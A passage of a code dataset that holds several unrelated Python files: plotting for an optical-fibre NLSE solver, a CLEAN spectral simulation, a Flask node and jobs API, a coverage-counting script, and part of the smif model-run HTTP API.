[THz]')\n#plt.grid()\n#plt.legend(frameon=False)\n#plt.show()\n\n\n\nplt.figure()\nplt.title('Output Spectrum. z='+str(distance/1e3)+'km')\nplt.plot(freq/1e12,spectralPower(Spectot0)*1e12, linewidth=5,label='Input')#'E='+str(np.round(spectralEnergy(freq,Spectot0)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,spectralPower(Specfinal_NL)*1e12, 'r-',linewidth=5,label='Only NL')#'E='+str(np.round(spectralEnergy(freq,specfinal)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,spectralPower(Spectot)*1e12, linewidth=5,label='Output')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,boxfilt0, linewidth=5,label='boxfilt0')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.plot(freq/1e12,boxfiltm1, linewidth=5,label='boxfiltm1')#'E='+str(np.round(spectralEnergy(freq,Spectot)*1e9,4))+'nJ. E_th= '+str(E1_th+E2_th)+'nJ')\nplt.xlabel('Frequency [THz]')\nplt.ylabel('Power density [W/THz]')\nplt.yscale('log')\nplt.grid()\nplt.axis([-0.1,0.1,np.max(np.abs(Spectot0)**2*1e12)*1e-9,np.max(np.abs(Spectot0)**2*1e12)*10])\nplt.legend(frameon=False)\nplt.show()\n\nminus2Spectrum=getSideband(freq,Spectot,omegalist[1]/2/pi-fm,omegalist[0]/2/pi-fm,sidebandnumber)\n\ntt,minus2Pulse=getPulseFromSpectrum(freq,minus2Spectrum)\n\n\n\n\nplt.figure()\nplt.plot(tau*1e9,pulsePower(minus2Pulse))\nplt.grid()\nplt.show()\n\nS0=pulsePower(minus2Pulse)\nS1=(np.abs(minus2Pulse[0])**2-np.abs(minus2Pulse[1])**2)/S0\nS2=2*np.real(minus2Pulse[0]*np.conj(minus2Pulse[1]))/S0\nS3=-2*np.imag(minus2Pulse[0]*np.conj(minus2Pulse[1]))/S0\n\nfig,ax=plt.subplots()\nplt.title('Output Pol. for n='+str(sidebandnumber)+' sideband (Numerical)')\nplt.plot(tau*1e9,pulsePower(pulse1)/np.max(pulsePower(pulse1)),'m--',label='Input Pulse')\nplt.plot(tau*1e9,S0/np.max(S0),'--',label='S0')\nplt.plot(tau*1e9,S1**2*np.sign(S1),'--',label='S1')\nplt.plot(tau*1e9,S2**2*np.sign(S2),'--',label='S2')\nplt.plot(tau*1e9,S3**2*np.sign(S3),'--',label='S3')\nplt.grid()\nplt.legend(loc='upper right')\nax.legend(loc='upper center', bbox_to_anchor=(1.25, 0.8),\n ncol=1, fancybox=True, shadow=True)\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n\nS1=(np.abs(pol1[0])**2-np.abs(pol1[1])**2)*np.ones_like(pulse1[0])\nS2=2*np.real(pol1[0]*np.conj(pol1[1]))*np.ones_like(pulse1[0])\nS3=-2*np.imag(pol1[0]*np.conj(pol1[1]))*np.ones_like(pulse1[0])\n\nplt.figure()\nplt.title('Input Polarization for signal (n=-1)')\nplt.plot(tau*1e9,pulsePower(pulse1)/np.max(pulsePower(pulse1)),label='S0')\nplt.plot(tau*1e9,np.abs(S1)**2*np.sign(S1),label='S1')\nplt.plot(tau*1e9,np.abs(S2)**2*np.sign(S2),label='S2')\nplt.plot(tau*1e9,np.abs(S3)**2*np.sign(S3),label='S3')\nplt.grid()\nplt.legend()\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n\n\nS1=(np.abs(pol2[0])**2-np.abs(pol2[1])**2)*np.ones_like(pulse2[0])\nS2=2*np.real(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse2[0])\nS3=-2*np.imag(pol2[0]*np.conj(pol2[1]))*np.ones_like(pulse2[0])\n\nplt.figure()\nplt.title('Input Polarization for pump (n=0)')\nplt.plot(tau*1e9,pulsePower(pulse2)/np.max(pulsePower(pulse2)),label='S0')\nplt.plot(tau*1e9,np.abs(S1)**2*np.sign(S1),label='S1')\nplt.plot(tau*1e9,np.abs(S2)**2*np.sign(S2),label='S2')\nplt.plot(tau*1e9,np.abs(S3)**2*np.sign(S3),label='S3')\nplt.grid()\nplt.legend()\nplt.axis([-50,50,-1.05,1.05])\nplt.show()\n\n#print(\" \")\n#print(\"Begin creating animation of the evolution of the spectrum\")\n#print(\" \")\n#@gif.frame\n#def plot(i,Spectot0,Specfinal_NL,spectrummatrix):\n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# \n# plt.plot(freq/1e12, np.abs(spectrummatrix[i*10,:])**2*1e12+1e-100,'r-',label='Output') \n# plt.plot(freq/1e12, np.abs(Spectot0)**2*1e12+1e-100,'b-',alpha=0.7,label='Input')\n# #plt.plot(freq/1e12, np.abs(Specfinal_NL)**2*1e12, 'r-',label='Only NL')\n# plt.xlabel('Frequency [THz]')\n# plt.ylabel('Power density [W/THz]')\n# plt.yscale('log')\n# plt.grid()\n# #plt.axis([omegalist[1]/1e12/2/pi-5*ws/2/pi/1e12,omegalist[0]/1e12/2/pi+5*ws/2/pi/1e12,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n# \n# #plt.axis([0.072,0.076,np.max(np.abs(Spectot0)**2*1e12)*1e-15,np.max(np.abs(Spectot0)**2*1e12)*10])\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot(i,Spectot0,Specfinal_NL,spectrummatrix)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot(10,Spectot0,Specfinal_NL,spectrummatrix)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\EvolvingSpectrum.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the spectrum\")\n#print(\" \")\n#\n#print(\" \")\n#print(\"Begin creating animation of the evolution of the pulse\")\n#print(\" \")\n#\n#@gif.frame\n#def plot2(i,pulsetot0,Pulsefinal_disp,pulsematrix):\n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# plt.plot(tau*1e9, np.abs(pulsetot0)**2+1e-100,label='Input')\n# plt.plot(tau*1e9, np.abs(Pulsefinal_disp)**2+1e-100, 'r-',label='Only Disp')\n# plt.plot(tau*1e9, np.abs(pulsematrix[i*10,:])**2+1e-100,label='Output') \n# \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.axis([-1,1,0,10*np.max(np.abs(Pulsetot0)**2)])\n# \n# #plt.axis([-10*np.max(Tlist)*1e9,10*np.max(Tlist)*1e9,0,10*np.max(np.abs(Pulsetot0)**2)])\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n#\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot2(i,Pulsetot0,Pulsefinal_disp,pulsematrix)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot2(10,Pulsetot0,Pulsefinal_disp,pulsematrix)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\EvolvingPulse.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the pulse\")\n#print(\" \")\n#\n#\n#print(\" \")\n#print(\"Begin creating animation of the extracted pulse\")\n#print(\" \")\n#\n#\n#\n#@gif.frame\n#def plot3(i,pulse2,extractedPulses):\n# \n# \n# \n# plt.figure(figsize=(10, 6), dpi=gifsize)#\n# plt.title('z = '+str(np.round(i/10*distance/1e3,rounding))+'km')\n# plt.plot(tau*1e9, np.abs(pulse2)**2+1e-100,label='Input')\n# plt.plot(tau*1e9, np.abs(extractedPulses[i*10,:])**2+1e-100,label='Output. Ampl = +'+str(np.round( 10*np.log10(np.max(np.abs(extractedPulses[i*10,:])**2)/np.max(np.abs(pulse2)**2) ),rounding)) +'dB') \n# \n# plt.xlabel('Time [ns]')\n# plt.ylabel('Power [W]')\n# plt.axis([np.min(tau)*1e9,np.max(tau)*1e9,1e-6,10*np.max(np.abs(extractedPulses[100,:])**2)])\n# plt.yscale('log')\n# plt.grid()\n# plt.legend(loc=\"upper right\", bbox_to_anchor=(0.8,0.7),frameon=False)\n# #plt.show()\n#\n#extractedSpectra=np.multiply(spectrummatrix,boxfilt0)\n#extractedPulses=np.zeros_like(extractedSpectra)\n#for i in range(0,step_num+1):\n# #print(i)\n# ss, pulse=getPulseFromSpectrum(freq,extractedSpectra[i,:])\n# extractedPulses[i,:]=pulse\n#\n#\n#frames = []\n#print (frames)\n#for i in range(0,11):\n# frame = plot3(i,pulse2,extractedPulses)\n# frames.append(frame)\n# print(np.round(i/(11)*100,rounding))\n#\n#frame = plot3(10,pulse2,extractedPulses)\n#frames.append(frame)\n#\n#gif.save(frames, \"C:\\\\Users\\\\Bruger\\\\Dropbox\\\\Canada\\\\PhD\\\\Research Questions\\\\High Ext pulses\\\\Resolution enhancement\\\\Evolving_m=0_Pulse.gif\", duration=700)\n#\n#print(\" \")\n#print(\"Finished the animation of the extracted pulse\")\n#print(\" \")\n#\n#frames=[]\n#\n#print(\" \")\n#print(\"Begin making surface plots of spectra and pulses\")\n#print(\" \")\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Spectrum Evolution')\n#x = fplot\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#Z=np.abs(spectrummatrix)**2*1e12+1e-100\n#Z = np.log10(Z[:-1, :])\n#Z[Z<-30]=-30\n#surf=ax.contourf(X, Y, Z)\n#ax.set_xlabel('Frequency [THz]')\n#ax.set_ylabel('Distance [km]')\n#ax.set_xlim(np.min(fplot),np.max(fplot))\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Intensity [W/THz]\" )\n#plt.savefig('SpectrumEvolution.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Pulse Evolution for m=0')\n#x = tau*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#Z=(np.abs(extractedPulses)**2+1e-100)/(np.max(np.abs(extractedPulses[0,:])**2))\n#Z = 10*np.log10(Z[:-1, :])\n#Z[Z<-30]=-30\n#surf=ax.contourf(X, Y, Z)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n#ax.set_xlim(-40, 40)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Amplification [dB]\" )\n#plt.savefig('PulseEvolution.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#chirpzoom=2**3\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Pulse Chirp')\n#x = tau[int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#\n#chirpmatrix=np.zeros_like(X)\n#\n#\n#for i in range(0,len(pulsematrix[:,1])-1):\n# line=pulsematrix[i,int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]\n# c=getChirp(tau,line)\n# chirpmatrix[i,:]=c-np.mean(c[0:1000])\n# i=i+1\n#\n#Z=chirpmatrix/1e6\n##Z =(Z[:-1, :])\n##Z[Z<-300]=-300\n#surf=ax.contourf(X, Y, Z,cmap='RdBu')#levels=np.linspace(-5/2*np.min(Tlist)/1e6,5/2*np.min(Tlist)/1e6,11)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n##ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Chirp [MHz]\" )\n##plt.savefig('PulseChirp_wholePulse.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#fig, ax = plt.subplots()\n#ax.set_title('Chirp of m=0 pulse')\n#x = tau[int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]*1e9\n#y = np.linspace(0,step_num*deltaz,step_num)/1e3 \n#X, Y = np.meshgrid(x, y)\n#\n#chirpmatrix=np.zeros_like(X)\n#\n#\n#for i in range(0,len(extractedPulses[:,1])-1):\n# line=extractedPulses[i,int(nt/2-nt/chirpzoom):int(nt/2+nt/chirpzoom)]\n# c=getChirp(tau,line)\n# chirpmatrix[i,:]=c-np.mean(c[0:1000])\n# i=i+1\n#\n#Z=chirpmatrix/1e6\n##Z =(Z[:-1, :])\n##Z[Z<-300]=-300\n#surf=ax.contourf(X, Y, Z,cmap='RdBu')#levels=np.linspace(-5/2*np.min(Tlist)/1e6,5/2*np.min(Tlist)/1e6,11)\n#ax.set_xlabel('Time [ns]')\n#ax.set_ylabel('Distance [km]')\n##ax.set_xlim(-5*np.max(Tlist)*1e9,5*np.max(Tlist)*1e9)\n#cbar=fig.colorbar(surf, ax=ax) \n#cbar.set_label(\"Chirp [MHz]\" )\n##plt.savefig('PulseChirp_wholePulse.pdf',bbox_inches='tight')\n#plt.show()\n#\n#\n#bb2=np.array([11.2,5.6, 0,-0.112,-0.56,-1.11,-2.8,-5.6,-11.2])\n#dBP=np.array([ 4, 4,20, 20, 24, 32, 40, 50, 4])\n#\n#plt.figure()\n#plt.title('Max amp. vs. disp')\n#plt.plot(bb2,dBP,'b.',markersize=15)\n#plt.xlabel('beta2 [ps^2/m]')\n#plt.ylabel('Max ampl of m=0 [dB]')\n#plt.grid()\n#plt.show()\n#\n#\n","repo_name":"OleKrarup123/NLSE-vector-solver","sub_path":"NLSE solver Vector V1.py","file_name":"NLSE solver Vector V1.py","file_ext":"py","file_size_in_byte":50318,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"32158590818","text":"import sys\nsys.path.append('../')\nimport numpy as np\nfrom algorithms import CLEANed\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif']=['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus']=False #用来正常显示负号\n\n###########################\n#####simulation-signal#####\n###########################\nN = 200\ns0 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//1.5))))]*4 + 0\ns1 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//7.5))))]*4 + 1\ns2 = np.linspace(0, N//4-1, N//4)[list(set(np.random.choice(N//4, int(N//1.5))))]*4 + 2\ns3 = np.linspace(0, N//4-1, N//4)*4 + 3\nsample_point = np.sort(np.hstack((s1, s2, s3))).astype(int)\n\nT = 1\nt = np.linspace(0, T, N)[sample_point]\nf = np.cos(2*np.pi*31.25*t)\n\ng = 0.1\nnu_D,nu_W,W,B,R,S,power_spec = CLEANed(f, t, g=g)\n\n\n\n#####################\n#for continue func\nt_c = np.linspace(0, 1, 2000)\nf_c = np.cos(2*np.pi*31.25*t_c)\nnu_c = (np.linspace(0, len(t_c)-1, len(t_c))-len(t_c)//2)/len(t_c)*(len(t_c)-1)/t_c[-1]\nD_c = np.sum(f_c * np.exp(-2j*np.pi*(nu_c.reshape(len(nu_c), 1) * t_c)), axis=1)/len(t_c)\n\n\n###############################################\n######plot for fig:spectral_simult_signal######\n###############################################\nfig=plt.figure(figsize=(20,16))\nplt.subplots_adjust(hspace=0.2, wspace=0.2)\nax1=plt.subplot(2,2,1)\nax1.plot(t, f, 'k*')\nax1.plot(t_c, f_c, 'k--')\nax1.set_xlim(-0.02,1.02)\n\nax2=plt.subplot(2,2,2)\nax2.plot(nu_c, np.abs(D_c),'k-', label='F')\nax2.set_ylim(-0.025,0.525)\n\nax3=plt.subplot(2,2,3)\nax3.plot(nu_D, np.abs(R[0]),'k-', label='D')\n\nax4=plt.subplot(2,2,4)\nm = len(nu_W)//4\nax4.plot(nu_W[m-10:3*m+11], np.abs(W[m-10:3*m+11]),'k-', label='W')\nax4.plot(nu_W[m-10:3*m+11], np.abs(B[m-10:3*m+11]),'k-.', label='B')\n\ny_ticks_ax1=np.array([-1,-0.5,0,0.5,1])\nax1.set_yticks(y_ticks_ax1)\nax1.set_yticklabels(list(y_ticks_ax1),fontsize=16)\n\nfor (ax, label) in zip([ax1,ax2,ax3,ax4],['(a)','(b)', '(c)', '(d)']):\n ax.tick_params(labelsize=15)\n ax.text(-0.12, 0.96, label, horizontalalignment='center', fontsize=25, \n verticalalignment='center', transform=ax.transAxes)\n \nfor ax_i in [ax2,ax3,ax4]:\n ax_i.set_xlim(-105,105)\n ax_i.set_xlabel(u'频率 (Hz)',fontsize=25, labelpad = 10)\n ax_i.set_ylabel(u'功率',fontsize=25, labelpad = 15)\n ax_i.legend(loc='upper right', fontsize=20)\n ax_i.tick_params(labelsize=20)\n \nax1.set_xlabel(u'时间 (秒)',fontsize=25, labelpad = 10)\nax1.set_ylabel(u'信号',fontsize=25, labelpad = 0)\nax1.tick_params(labelsize=20)\n\n#plt.savefig('spectral_simult_signal.png', bbox_inches='tight')\nplt.show()\n\n\n################################################\n######plot for fig:spectral_simult_clean_g######\n################################################\nfig, ax = plt.subplots(4,2, sharey=True)\nplt.subplots_adjust(hspace=0.05, wspace=0.03)\nfig.set_size_inches(20,20)\nax[0, 0].plot(nu_D, np.abs(R[len(R)//8]),'k-')\nax[0, 1].plot(nu_D, np.abs(S[len(R)//8]),'k-')\nax[1, 0].plot(nu_D, np.abs(R[len(R)//4]),'k-')\nax[1, 1].plot(nu_D, np.abs(S[len(R)//4]),'k-')\nax[2, 0].plot(nu_D, np.abs(R[len(R)//2]),'k-')\nax[2, 1].plot(nu_D, np.abs(S[len(R)//2]),'k-')\nax[3, 0].plot(nu_D, np.abs(R[-1]),'k-')\nax[3, 1].plot(nu_D, np.abs(S[-1]),'k-')\n\niter_num= [len(R)//8, len(R)//4, len(R)//2, len(R)-1]\nfor ax_i, iter_i in zip(ax,iter_num):\n ax_i[0].set_ylabel(u'{0}*{1} 功率'.format(iter_i, g), fontsize=25, labelpad = 15)\n for ax_ii in ax_i:\n ax_ii.set_xlim(-105,105)\n ax_ii.set_ylim(-0.01, 0.52)\n ax_ii.tick_params(labelsize=20)\nax[0,0].set_title(u'脏谱',fontsize=30, pad = 20)\nax[0,1].set_title(u'洁谱',fontsize=30, pad = 20)\nax[-1,0].set_xlabel(u'频率 (Hz)',fontsize=25, labelpad = 10)\nax[-1,1].set_xlabel(u'频率 (Hz)',fontsize=25, labelpad = 10)\n \nfor ax_i in ax[:-1]:\n for ax_ii in ax_i:\n ax_ii.xaxis.set_tick_params(size=0)\n ax_ii.set_xticklabels('')\n#plt.savefig('spectral_simult_clean_g{0}.png'.format(g), bbox_inches='tight')\nplt.show()\n","repo_name":"fallingelf/PhD_Thesis","sub_path":"examples/simulation_signal.py","file_name":"simulation_signal.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17354385684","text":"from flask import Flask, send_from_directory\nfrom controllers.node_controller import *\nfrom communication.response_creator import *\nfrom controllers.node_controller import NetworkWaitException\n\nimport os.path as path\nimport sys\n\ngit_root = path.abspath(path.join(__file__, \"../../..\"))\n\napp = Flask('node', static_folder=git_root + '/angularjs/app/static')\n\n\n@app.route('/')\ndef default_response():\n return send_from_directory(git_root + '/angularjs/app', filename=\"index.html\")\n\n\n@app.route('/controller/')\ndef serve_controller(filename):\n return send_from_directory(git_root + '/angularjs/app/controller', filename=filename)\n\n\n@app.route('/service/')\ndef serve_service(filename):\n return send_from_directory(git_root + '/angularjs/app/service', filename=filename)\n\n\n@app.route('/app.js')\ndef serve_appjs():\n return send_from_directory(git_root + '/angularjs/app', filename='app.js')\n\n\n@app.route('/view/')\ndef serve_views(filename):\n return send_from_directory(git_root + '/angularjs/app/view', filename=filename)\n\n\n# Node API\n@app.route('/api/basic/ok', methods=['GET'])\ndef basic_ok():\n return ok_response({})\n\n\n@app.route('/api/basic/info', methods=['GET'])\ndef basic_info():\n try:\n ret = basic_info_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/basic/check', methods=['POST'])\ndef basic_check():\n try:\n [ip, port] = extract_data(request, ['ip', 'port'])\n except Exception as e:\n return error_response(str(e))\n\n try:\n ret = basic_check_controller(ip, port)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n# Network API\n@app.route('/api/network/edges', methods=['GET'])\ndef network_edges():\n try:\n ret = network_edges_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/network/get_edge', methods=['POST'])\ndef network_get_edge():\n try:\n [type] = extract_data(request, ['type'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_get_edge_controller(type))\n\n\n@app.route('/api/network/set_edge', methods=['POST'])\ndef network_set_edge():\n try:\n [edge] = extract_data(request, ['edge'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_set_edge_controller(edge))\n\n\n@app.route('/api/network/adopt', methods=['POST'])\ndef network_adopt():\n try:\n [edge, can_redirect] = extract_data(request, ['edge', 'can_redirect'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(network_adopt_controller(edge, can_redirect))\n\n\n@app.route('/api/network/reset', methods=['GET'])\ndef network_reset():\n try:\n ret = network_reset_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n\n return ok_response(ret)\n\n\n@app.route('/api/network/visualize', methods=['GET'])\ndef network_visualize():\n try:\n ret = network_visualize_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n# Jobs API\n@app.route('/api/jobs/add/', methods=['POST'])\ndef jobs_add(jobid):\n try:\n [width, height, p, points] = extract_data(request, ['width', 'height', 'p', 'points'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n print(width, height, p, points)\n try:\n ret = jobs_add_controller(job_id=jobid, width=width, height=height, p=p, points=points)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/new', methods=['POST'])\ndef jobs_new():\n try:\n [width, height, p, points] = extract_data(request, fields=['width', 'height', 'p', 'points'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n try:\n ret = jobs_new_controller(width=width, height=height, p=p, points=points)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/all', methods=['GET'])\ndef jobs_all():\n try:\n ret = jobs_all_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/backup', methods=['POST'])\ndef jobs_backup():\n try:\n [uuid, jobid, point] = extract_data(request, fields=['uuid', 'jobid', 'point'])\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n try:\n ret = jobs_backup_controller(uuid=uuid, job_id=jobid, point=point)\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/remove/', methods=['GET'])\ndef jobs_remove(jobid):\n try:\n ret = jobs_remove_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/kill/', methods=['GET'])\ndef jobs_kill(jobid):\n try:\n ret = jobs_kill_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/ids', methods=['GET'])\ndef jobs_ids():\n try:\n ret = jobs_ids_controller()\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/data/', methods=['GET'])\ndef jobs_data(jobid):\n try:\n ret = jobs_data_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n\n\n@app.route('/api/jobs/visualize/', methods=['GET'])\ndef jobs_visualize(jobid):\n try:\n ret = jobs_visualize_controller(job_id=jobid)\n except NetworkWaitException:\n return wait_response()\n except Exception as e:\n return error_response(str(e))\n return ok_response(ret)\n","repo_name":"delta003/distributed_chaos","sub_path":"python/api/node_api.py","file_name":"node_api.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6062209535","text":"import sys\nimport pandas as pd\n\ndef main():\n input_files = sys.argv[1:] # get all inputs from the command line into a list\n data = [] # initialize a data list\n for input_file in input_files: # iterate over every input file\n count = open(input_file, 'r').readline().rstrip() # get the first line of the file, wich is the count\n sample = input_file.split('/')[-1].split('_')[0]\n\n data.append([sample, count]) # append data list by extracted informations\n\n df = pd.DataFrame(data, columns=['sample', 'coverage']) # create dataframe from data list with specified column names\n df.to_csv('coverages.csv', index=False) # save dataframe to csv file\n\n\nif __name__ == '__main__':\n\n main()","repo_name":"jw44lavo/redux","sub_path":"wf_annotation_gpav/scripts/get_coverages_dataframe.py","file_name":"get_coverages_dataframe.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27374544282","text":"\"\"\"HTTP API endpoint\n\"\"\"\nfrom collections import defaultdict\n\nimport dateutil.parser\nimport smif\nfrom flask import current_app, jsonify, request\nfrom flask.views import MethodView\nfrom smif.exception import (\n SmifDataError,\n SmifDataInputError,\n SmifDataNotFoundError,\n SmifException,\n SmifValidationError,\n)\n\n\nclass SmifAPI(MethodView):\n \"\"\"Implement operations for Smif\"\"\"\n\n def get(self, key):\n \"\"\"Get smif details\n version: GET /api/v1/smif/version\n \"\"\"\n if key == \"version\":\n data = smif.__version__\n else:\n data = {}\n data[\"version\"] = smif.__version__\n\n response = jsonify({\"data\": data, \"error\": {}})\n return response\n\n\nclass ModelRunAPI(MethodView):\n \"\"\"Implement CRUD operations for model_run configuration data\"\"\"\n\n def get(self, model_run_name=None, action=None):\n \"\"\"Get model_runs\n all: GET /api/v1/model_runs/\n one: GET /api/vi/model_runs/name\n \"\"\"\n data_interface = current_app.config.data_interface\n\n try:\n if action is None:\n if model_run_name is None:\n\n model_runs = data_interface.read_model_runs()\n\n if \"status\" in request.args.keys():\n # filtered: GET /api/v1/model_runs?status=done\n data = []\n for model_run in model_runs:\n status = current_app.config.scheduler.get_status(\n model_run[\"name\"]\n )\n if status[\"status\"] == request.args[\"status\"]:\n data.append(model_run)\n else:\n # all: GET /api/v1/model_runs/\n data = []\n data = model_runs\n else:\n # one: GET /api/vi/model_runs/name\n data = {}\n data = data_interface.read_model_run(model_run_name)\n elif action == \"status\":\n # action: GET /api/vi/model_runs/name/status\n data = {}\n data = current_app.config.scheduler.get_status(model_run_name)\n\n response = jsonify({\"data\": data, \"error\": {}})\n except SmifException as err:\n response = jsonify({\"data\": data, \"error\": parse_exceptions(err)})\n\n return response\n\n def post(self, model_run_name=None, action=None):\n \"\"\"\n Create a model_run:\n - POST /api/v1/model_runs\n\n Perform an operation on a model_run\n - POST /api/v1/model_runs//\n\n Available actions are\n - start: Start the model_run\n - kill: Stop a model_run that is currently running\n - remove: Remove a model_run that is waiting to be executed\n - resume: Warm start a model_run\n \"\"\"\n data_interface = current_app.config.data_interface\n\n try:\n if action is None:\n data = request.get_json() or request.form\n data_interface.write_model_run(data)\n elif action == \"start\":\n data = request.get_json() or request.form\n args = {\n \"verbosity\": data[\"args\"][\"verbosity\"],\n \"warm_start\": data[\"args\"][\"warm_start\"],\n \"output_format\": data[\"args\"][\"output_format\"],\n }\n if hasattr(data_interface, \"model_base_folder\"):\n args[\"directory\"] = data_interface.model_base_folder\n current_app.config.scheduler.add(model_run_name, args)\n elif action == \"kill\":\n current_app.config.scheduler.kill(model_run_name)\n elif action == \"remove\":\n raise NotImplementedError\n elif action == \"resume\":\n raise NotImplementedError\n else:\n raise SyntaxError(\"ModelRun action '%s' does not exist\" % action)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 201\n return response\n\n def put(self, model_run_name):\n \"\"\"Update a model_run:\n PUT /api/v1/model_runs\n \"\"\"\n data_interface = current_app.config.data_interface\n data = request.get_json() or request.form\n\n try:\n data_interface.update_model_run(model_run_name, data)\n except SmifException as err:\n response = jsonify(\n {\"message\": \"failed\", \"data\": data, \"error\": parse_exceptions(err)}\n )\n else:\n response = jsonify({\"message\": \"success\"})\n\n response.status_code = 200\n return response\n\n def delete(self, model_run_name):\n \"\"\"Delete a model_run:\n DELETE /api/v1/model_runs\n \"\"\"\n data_interface = current_app.config.data_interface\n data_interface.delete_model_run(model_run_name)\n response = jsonify({})\n return response\n\n\nclass 